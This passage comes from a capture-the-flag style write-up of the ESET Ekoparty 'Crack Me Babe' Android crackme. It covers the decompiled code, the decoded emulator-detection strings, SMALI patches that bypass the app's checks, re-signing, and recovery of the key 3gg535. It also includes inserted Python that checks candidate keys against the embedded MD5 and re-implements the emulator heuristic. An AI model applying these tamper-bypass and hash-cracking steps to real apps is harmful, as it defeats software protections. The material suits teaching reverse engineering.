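    digest = hashlib.md5(text.encode("utf-8")).digest()
    as_int = int.from_bytes(digest, "big")   # new BigInteger(1, digest)
    return format(as_int, "032x")            # String.format("%032x", ...)


def key_matches(candidate, expected_hex=EMBEDDED_MD5):
    """The app's test, including equalsIgnoreCase: hex case does not matter."""
    return java_style_md5(candidate).lower() == expected_hex.lower()


def find_key(candidates, expected_hex=EMBEDDED_MD5):
    """Offline counterpart of looking the hash up on the internet.  An unsalted
    MD5 of a short key gives no real protection once the hash ships inside the
    APK: any candidate list can be checked against it directly."""
    for word in candidates:
        if key_matches(word, expected_hex):
            return word
    return None


if __name__ == "__main__":
    # Constructed candidate list; the post reports the key as 3gg535.
    print(find_key(["password", "gollum", "3gg535"]))
```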
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Decryption of the "enc" resource located in assets/ via class b</b></span><b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;">, function b.decrypt();</span></span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJsDhn5GojMPTS5Hw2E9EREBq-XYZfEMx31VYuCvCS_8r3qvBvUMXUYpg-1rQnus1dLWIHMQwicIRWvr_PrhmyvQhqiPDtgFIGNK4k7WRWPIlRQzmGibzi2SJQeHxJ-8LK-SZRMd3zg4/s1600/enc-recurso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJsDhn5GojMPTS5Hw2E9EREBq-XYZfEMx31VYuCvCS_8r3qvBvUMXUYpg-1rQnus1dLWIHMQwicIRWvr_PrhmyvQhqiPDtgFIGNK4k7WRWPIlRQzmGibzi2SJQeHxJ-8LK-SZRMd3zg4/s640/enc-recurso.jpg" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">protected String doInBackground(String[] paramArrayOfString)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> File localFile = new File(Environment.getExternalStorageDirectory().getPath() + "<b>/content.apk</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((localFile.exists()) && (localFile.length() > 0L))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return "Error";</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><span style="font-size: x-small;"> InputStream localInputStream = </span><b><span style="font-size: x-small;">Login.this.getApplicationContext().</span>getResources().getAssets().open("enc");</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> FileOutputStream localFileOutputStream = new FileOutputStream(localFile);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><span style="font-size: x-small;"> </span><b><span style="color: #cc0000;"><span style="font-size: large;"> b.decrypt</span>(</span>paramArrayOfString[0], localInputStream, localFileOutputStream);</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramArrayOfString = new Intent("android.intent.action.VIEW");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> <b> paramArrayOfString.setDataAndType(Uri.fromFile(localFile), "application/vnd.android.package-archive</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Login.this.startActivity(paramArrayOfString);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.blnResult = true;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return "Executed";</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> catch (Exception paramArrayOfString)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> while (true)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramArrayOfString.printStackTrace();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Log.e(d.z, paramArrayOfString.getMessage());</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>-----------------------------------------------------------------------------------------------------</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class d</b>, which calls class<b> e </b>to decrypt several strings that will later be used in class<b> f </b>to check which specific type of device the app is running on, and to divert the reverser's attention a little.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">package eset.ekoparty.challenge.crackmebabe;</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">public class <b>d</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">{</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static String a = "12321322869";</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String b = e.pqz("htDaDYyZOg==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String c = e.pqz("tNrV");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String g = e.pqz("5Y6OT9PAbvGYtDsxJChCQI0=");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String h = e.pqz("5dnREIScO57b4GAj");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String i = e.pqz("5fvTCo+RKq7apg==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String k = e.pqz("5dnbEYaCN6KK");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String l = e.pqz("5cvQFI2fKa+K");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String m = e.pqz("5f/QG5GfN6WI109KNHoHGcNbxcOzZ57tl8xC");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String n = e.pqz("5fnbEZqdMbXB62Uj");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String y = e.pqz("r8rKD9nfca3F439nbTYRH8IA2tThctH5w48NXoLVdHkq1Yo=");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String z = e.pqz("hMzfHIjQE6SIxmpjcQ==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">}</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Decoded, they read:</b></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
a = 12321322869</div>
<div class="separator" style="clear: both;">
b = Android</div>
<div class="separator" style="clear: both;">
c = sdk</div>
<div class="separator" style="clear: both;">
g = 000000000000000</div>
<div class="separator" style="clear: both;">
h = google_sdk</div>
<div class="separator" style="clear: both;">
i = Emulator</div>
<div class="separator" style="clear: both;">
k = generic</div>
<div class="separator" style="clear: both;">
l = unknown</div>
<div class="separator" style="clear: both;">
m = Android SDK built for x86</div>
<div class="separator" style="clear: both;">
n = Genymotion</div>
<div class="separator" style="clear: both;">
y = http://lmgtfy.com/?q=gollum+riddles</div>
<div class="separator" style="clear: both;">
z = Crack Me Babe</div>
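<div class="separator" style="clear: both;">Two of the checks walked through above, re-implemented in Python as an added example (this is not code from the Crack Me Babe challenge or from this write-up): the Login class's MD5 comparison of the entered password against its hard-coded digest, and an emulator heuristic built from the decoded class d strings. The write-up does not show which android.os.Build field class f compares each string against, so the field mapping below is an assumption based on the usual Android emulator-detection pattern, and the sample Build values are constructed.</div>

```python
"""Added example: Login's MD5 check and a class-f style emulator heuristic.

Not code from the challenge. The string-to-Build-field mapping in
emulator_indicators() is an assumption; the write-up only lists the strings.
"""
import hashlib

# Digest hard-coded in Login, taken from the decompiled snippet in the write-up.
LOGIN_HASH = "16cc45d14201e8caf26d48e636b1c48d"

# Decoded constants of class d, as listed in the write-up. D_B ("Android") is
# decoded as well, but its use is not shown, so it is not part of the heuristic.
D_B = "Android"
D_C = "sdk"
D_G = "000000000000000"
D_H = "google_sdk"
D_I = "Emulator"
D_K = "generic"
D_L = "unknown"
D_M = "Android SDK built for x86"
D_N = "Genymotion"


def md5_hex(text: str) -> str:
    """MD5 of the UTF-8 bytes, rendered the way String.format("%032x", BigInteger) does."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def md5_matches(candidate: str, expected_hex: str) -> bool:
    """Mirror of Login's equalsIgnoreCase() comparison against the stored digest."""
    return md5_hex(candidate).lower() == expected_hex.lower()


def emulator_indicators(build: dict) -> list:
    """Return the names of every emulator heuristic that fires for `build`.

    `build` holds the android.os.Build fields FINGERPRINT, MODEL, MANUFACTURER,
    BRAND, DEVICE and PRODUCT plus DEVICE_ID (the IMEI from TelephonyManager).
    Assumed mapping: fingerprint -> k/l, model -> h/i/m, manufacturer -> n,
    brand+device -> k, product -> c/h, imei -> g.
    """
    hits = []
    fingerprint = build.get("FINGERPRINT", "")
    model = build.get("MODEL", "")
    if fingerprint.startswith(D_K) or fingerprint.startswith(D_L):
        hits.append("fingerprint")
    if D_H in model or D_I in model or D_M in model:
        hits.append("model")
    if D_N in build.get("MANUFACTURER", ""):
        hits.append("manufacturer")
    if build.get("BRAND", "").startswith(D_K) and build.get("DEVICE", "").startswith(D_K):
        hits.append("brand_device")
    if build.get("PRODUCT", "") in (D_C, D_H):
        hits.append("product")
    if build.get("DEVICE_ID") == D_G:
        hits.append("imei")
    return hits


def looks_like_emulator(build: dict) -> bool:
    """True when at least one indicator fires (the app would then refuse to run)."""
    return bool(emulator_indicators(build))


# Constructed sample Build values, not captured from real devices.
SAMPLE_EMULATOR = {
    "FINGERPRINT": "generic/sdk_google_phone_x86/generic_x86:4.4.2/KK/constructed:user/test-keys",
    "MODEL": "Android SDK built for x86",
    "MANUFACTURER": "unknown",
    "BRAND": "generic",
    "DEVICE": "generic_x86",
    "PRODUCT": "google_sdk",
    "DEVICE_ID": "000000000000000",
}
SAMPLE_PHONE = {
    "FINGERPRINT": "samsung/starltexx/starlte:9/constructed/1:user/release-keys",
    "MODEL": "SM-G960F",
    "MANUFACTURER": "samsung",
    "BRAND": "samsung",
    "DEVICE": "starlte",
    "PRODUCT": "starltexx",
    "DEVICE_ID": "352099001761481",
}

if __name__ == "__main__":
    # Reproduce the Login check with the password recovered in the write-up.
    print("3gg535 matches Login hash:", md5_matches("3gg535", LOGIN_HASH))
    print("emulator sample:", emulator_indicators(SAMPLE_EMULATOR))
    print("phone sample:", emulator_indicators(SAMPLE_PHONE))
```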
<div>
<br /></div>
<div class="separator" style="clear: both;">
<b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class e </b>is in charge of turning the base64 strings found in class d back into plain text</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">public class e</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">{</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> static String pqz(String paramString)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramString = new String(new a(d.a.getBytes("UTF-8")).a(Base64.decode(paramString.getBytes(), 0)), "UTF-8");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> String str = paramString.replace("\"", "");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Well, how do we get out of this mess....</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We already have the key, which is </span><b style="font-family: Arial, Helvetica, sans-serif;">3gg535</b><span style="font-family: "arial" , "helvetica" , sans-serif;">, meaning that the hardest part is the checks performed by the functions of the </span><b style="font-family: Arial, Helvetica, sans-serif;">Login </b><span style="font-family: "arial" , "helvetica" , sans-serif;">and </span><b style="font-family: Arial, Helvetica, sans-serif;">F</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> classes.</span><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b><span style="font-family: "arial" , "helvetica" , sans-serif;">So we are going to modify the SMALI code so that it lets us reach the password entry screen and decrypt the enc resource.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">After modifying the <b>.SMALI</b> files we recompile with APK-Multi-tool and sign with signapk.jar</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Modifying Login.SMALI</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Java code:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We change the if <b>((chkn()) && b(f.chks()))</b> to if <b>((f.chks()) && (f.chks()))</b></span><br />
<br />
<br />
<span style="color: #cc0000;"><span style="font-family: "arial" , "helvetica" , sans-serif;">if ((</span><b style="font-family: arial, helvetica, sans-serif;">f.chks()</b><span style="font-family: "arial" , "helvetica" , sans-serif;">) && (</span><b style="font-family: arial, helvetica, sans-serif;">f.chks()</b><span style="font-family: "arial" , "helvetica" , sans-serif;">)) </span></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> setContentView(2130968602);</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.bt = ((Button)findViewById(2131492970));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.tx = ((EditText)findViewById(2131492969));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.vw = ((TextView)findViewById(2131492971));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.vw.setOnClickListener(new c());</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> Toast.makeText(this.con, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.", 1).show();</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> Log.i(d.z, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.");</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> return;</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000; font-size: xx-small;"></span></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><b><br /></b></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: xx-small;">In .SMALI it would be:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> .line 63</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> :cond_1</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> invoke-static {}, Leset/ekoparty/challenge/crackmebabe/f;->chks()Z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> move-result v0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if-eqz v0, :cond_2</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> invoke-static {}, Leset/ekoparty/challenge/crackmebabe/f;->chks()Z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> move-result v0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if-eqz v0, :cond_2</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Modifying f.SMALI</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Java code:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We modify chks() so that it returns true whenever the SDK version is lower than 99; with this we can test it on any API level.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> public static boolean chks()</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> return Build.VERSION.SDK_INT < 99;</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">In .SMALI it would be:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> sget v0, Landroid/os/Build$VERSION;->SDK_INT:I</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> const/16 v1, 0x63 </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> if-ge v0, v1, :cond_0</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>We compile with option 12 of APK-Multi-tool</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s1600/000.jpg" imageanchor="1" style="font-family: "Times New Roman"; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s640/000.jpg" width="640" /></a></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Then we sign the APK with </span><span style="font-family: "arial" , "helvetica" , sans-serif;">signapk.jar</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">set usrc=0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">set heapy=512</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">echo Signing Apk</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">java -Xmx%heapy%m -jar signapk.jar -w testkey.x509.pem testkey.pk8 in.apk out.apk</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<b>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br />We install and run the APK.</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">And we see that it now skips past the checks and shows us the password prompt.</span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8cEGWR4ion6M7hqJpmF4WSAzm3FTs3FtWidS5ZKDrCLwhmBKdgjkb5MYo4MoT7tc8hyphenhyphenLbkohX0jlnQiDsTRgCVUZDbtQMvAOfTGvepzRcTg4ORoEpvWZIMhHVfKoAMtmWdRnefkxS58/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8cEGWR4ion6M7hqJpmF4WSAzm3FTs3FtWidS5ZKDrCLwhmBKdgjkb5MYo4MoT7tc8hyphenhyphenLbkohX0jlnQiDsTRgCVUZDbtQMvAOfTGvepzRcTg4ORoEpvWZIMhHVfKoAMtmWdRnefkxS58/s640/01.jpg" width="364" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We enter the password </span><b style="font-family: Arial, Helvetica, sans-serif;">3gg535</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> and the enc resource is decrypted.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YMROwtLaBlqFaKVqersBTWm3FtPPWGf4yfrdxT-csovtDnvDcj3qt9EKF7kosXYXnrVnesZ00uBeWvgez4RiJJCq-L4TYh5JpkTYAaqa9ROoRKDkAhMymvyX3Ya6iRMybVjL9ByZu5M/s1600/01b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YMROwtLaBlqFaKVqersBTWm3FtPPWGf4yfrdxT-csovtDnvDcj3qt9EKF7kosXYXnrVnesZ00uBeWvgez4RiJJCq-L4TYh5JpkTYAaqa9ROoRKDkAhMymvyX3Ya6iRMybVjL9ByZu5M/s640/01b.jpg" width="361" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgHQNUlWRrg8zX8xVV8JzAVKGMZXs850FplCa5iASfrq-qmKFzx7IwQxHgVBrt7e0rHUp2JwWljWwPCVm8lBLi1SdG9xr1UY8rmPwCQi9LjAg3MR4HVS3Pr0c5i961L4TTPVsL79T1wQ/s1600/01c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgHQNUlWRrg8zX8xVV8JzAVKGMZXs850FplCa5iASfrq-qmKFzx7IwQxHgVBrt7e0rHUp2JwWljWwPCVm8lBLi1SdG9xr1UY8rmPwCQi9LjAg3MR4HVS3Pr0c5i961L4TTPVsL79T1wQ/s640/01c.jpg" width="356" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">It then asks to be installed.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnbilznye2oYc43_iN9nynrEQqbuyHxqZ12aaOv2pWYxOfNiPy6aJvMmTCtqEP33tL8bjwYOryptaNJIk_qih_rNgAe9OZGqQI64FMU7HfvM312_ZRXe1teIn9XgDC5Pzy1ZhLT1xzARY/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnbilznye2oYc43_iN9nynrEQqbuyHxqZ12aaOv2pWYxOfNiPy6aJvMmTCtqEP33tL8bjwYOryptaNJIk_qih_rNgAe9OZGqQI64FMU7HfvM312_ZRXe1teIn9XgDC5Pzy1ZhLT1xzARY/s640/02.jpg" width="382" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
